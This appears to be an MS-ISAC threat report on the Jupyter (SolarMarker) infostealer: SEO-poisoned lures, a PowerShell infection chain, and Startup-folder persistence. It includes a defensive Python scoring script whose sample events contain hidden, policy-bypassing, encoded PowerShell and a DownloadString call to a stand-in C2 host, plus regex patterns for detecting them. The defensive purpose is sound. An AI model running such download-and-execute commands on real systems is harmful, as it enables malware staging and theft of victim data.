The Multi-State Information Sharing and Analysis Center (MS-ISAC) Cyber Threat Intelligence Team (CTI) assesses with moderate confidence that Jupyter, a highly evasive and adaptive .NET infostealer, will continue to opportunistically target state, local, tribal, and territorial (SLTT) organizations. Cyber Threat Actors (CTAs) have deployed Jupyter widely, leveraging SEO-poisoning to create watering hole sites, increasingly infecting SLTT entities since September. Recommendations to better secure your organization are at the end of this report.
Jupyter (aka SolarMarker) deploys a multi-stage process, leveraging PowerShell and legitimate tools, such as Slim PDF Reader, to drop secondary payloads that fingerprint victim information, including computer name, OS version, architecture, permissions, and user identifier.[1] Jupyter is likely impacting SLTTs as part of a broader opportunistic effort, since the malware is affecting an array of sectors, including finance, healthcare, and education.[2] Following a spike in activity during the fall, SLTT Jupyter infections subsided, with no incidents in December and a small resurgence through this past month.
The MS-ISAC determined SLTT victims became aware of infections when their endpoint detection and response (EDR) services alerted on unauthorized PowerShell commands attempting to communicate with command and control (C2) infrastructure. The MS-ISAC continues to investigate why Jupyter operators are harvesting victim information; CTAs commonly leverage infostealers for financial gain and intellectual property theft. Security researchers have observed the Jupyter operators adapting their tactics, techniques, and procedures (TTPs) and malware frequently, so intrusion details are likely to vary across infections.
Despite the irregularity in Jupyter TTPs, several features are common among publicly sourced and MS-ISAC-observed breaches. Prior to infection, the Jupyter operators inject over 2,000 keywords to push malicious Google and WordPress[3] sites up search engine rankings, a technique known as SEO-poisoning,[4] thereby increasing the likelihood that an unsuspecting user will visit the page. Analysis of an SLTT Jupyter incident revealed that the initial infection occurred after an end user attempted to download a malicious file, embedded with an executable, from a form on a compromised website. The malicious documents often carry an unassuming name, such as ‘Assignment-Of-Proprietary-Lease-Form-.exe’, to lure users into interacting with them. The installer launches the malicious executable, and Nitro Pro 13 then executes an MSI payload of over 100 MB, which allows it to bypass antivirus software due to file size limitations.
All observed attacks have shared the objective of harvesting victim information, including from the BIOS and browser, and communicating it to a C2 address. Appendix “Figure 2” depicts Jupyter’s commonly observed four-stage infection chain, starting with the web-hosted malicious executable.
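The behaviours the report describes (PowerShell launched by a document-named installer, an outbound download, an oversized MSI dropped in a Temp folder, and a file written to the user's Startup folder) can be scored together rather than alerted on one at a time. The following is an added example, not MS-ISAC code and not derived from any Jupyter sample: it runs simple heuristic rules over constructed process and file events in a generic dictionary form (real EDR telemetry will have different field names), and the rule weights, the 4-point alerting threshold and the set of "expected" PowerShell parents are assumptions chosen for illustration. The 100 MB MSI size and the Startup folder path are the report's own figures.

```python
import re
from collections import defaultdict

# Constructed sample telemetry, NOT real EDR output. Field names are an assumption;
# map them from whatever your sensor actually emits.
SAMPLE_EVENTS = [
    {"host": "WS01", "kind": "process",
     "parent": "Assignment-Of-Proprietary-Lease-Form-.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "WS01", "kind": "process", "parent": "powershell.exe", "image": "powershell.exe",
     "cmd": "(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s2')"},
    {"host": "WS01", "kind": "file",
     "path": r"C:\Users\jdoe\AppData\Local\Temp\setup.msi", "size": 120 * 1024 * 1024},
    {"host": "WS01", "kind": "file",
     "path": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk",
     "size": 2048},
    # Benign interactive use on a second host: should not score.
    {"host": "WS02", "kind": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "Get-ChildItem C:\\Users\\jdoe\\Documents"},
]

# Assumed weights: strong indicators (encoded command, download, persistence) count 2,
# weaker circumstantial ones count 1.
CMD_RULES = [
    ("hidden-window", 1, re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy-bypass", 1, re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I)),
    ("encoded-command", 2, re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("web-download", 2, re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod", re.I)),
]
STARTUP_RE = re.compile(r"Start Menu\\Programs\\Startup", re.I)
# Parents from which an interactive PowerShell launch is unremarkable (assumed list).
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}
OVERSIZED_MSI_BYTES = 100 * 1024 * 1024  # the report's >100 MB figure


def process_indicators(ev):
    """Return (indicator, weight) pairs for one PowerShell process event."""
    hits = []
    if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return hits
    if ev["parent"].lower() not in EXPECTED_PARENTS:
        hits.append(("unexpected-parent", 1))
    for name, weight, rx in CMD_RULES:
        if rx.search(ev["cmd"]):
            hits.append((name, weight))
    if STARTUP_RE.search(ev["cmd"]):
        hits.append(("startup-folder", 2))
    return hits


def file_indicators(ev):
    """Return (indicator, weight) pairs for one file-create event."""
    hits = []
    path = ev["path"]
    if path.lower().endswith(".msi") and "\\temp\\" in path.lower() \
            and ev["size"] > OVERSIZED_MSI_BYTES:
        hits.append(("oversized-installer-in-temp", 2))
    if STARTUP_RE.search(path):
        hits.append(("startup-folder", 2))
    return hits


def score_events(events):
    """Aggregate indicator weights per host across all events."""
    per_host = defaultdict(lambda: {"score": 0, "indicators": set()})
    for ev in events:
        hits = process_indicators(ev) if ev["kind"] == "process" else file_indicators(ev)
        entry = per_host[ev["host"]]
        for name, weight in hits:
            entry["score"] += weight
            entry["indicators"].add(name)
    return {h: {"score": v["score"], "indicators": sorted(v["indicators"])}
            for h, v in per_host.items()}


def flag_hosts(events, threshold=4):
    """Hosts whose combined score reaches the (assumed) alerting threshold."""
    scores = score_events(events)
    return sorted(h for h, v in scores.items() if v["score"] >= threshold)


if __name__ == "__main__":
    for host, result in score_events(SAMPLE_EVENTS).items():
        print(host, result)
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

Summing weights per host is what lets a single EDR alert on an encoded PowerShell command be corroborated by the surrounding file activity; any one rule alone (a hidden window, a large installer) is too noisy to page on by itself.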
Appendix excerpt (file paths and MITRE ATT&CK technique referenced in the report):
- AppData\Local\Temp\
- .\Users\’username’\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
- T1041 Exfiltration Over C2 Channel
Analytic confidence in this assessment is moderate. Source reliability is moderate, with several conflicts among sources that the CTI team attributes to Jupyter’s evolving tactics and infrastructure, as well as variation across security researcher methodology. The analyst used a Circleboard, Timeline, and Key Assumptions Check to perform this analysis.
For questions or comments, please contact us at [email protected].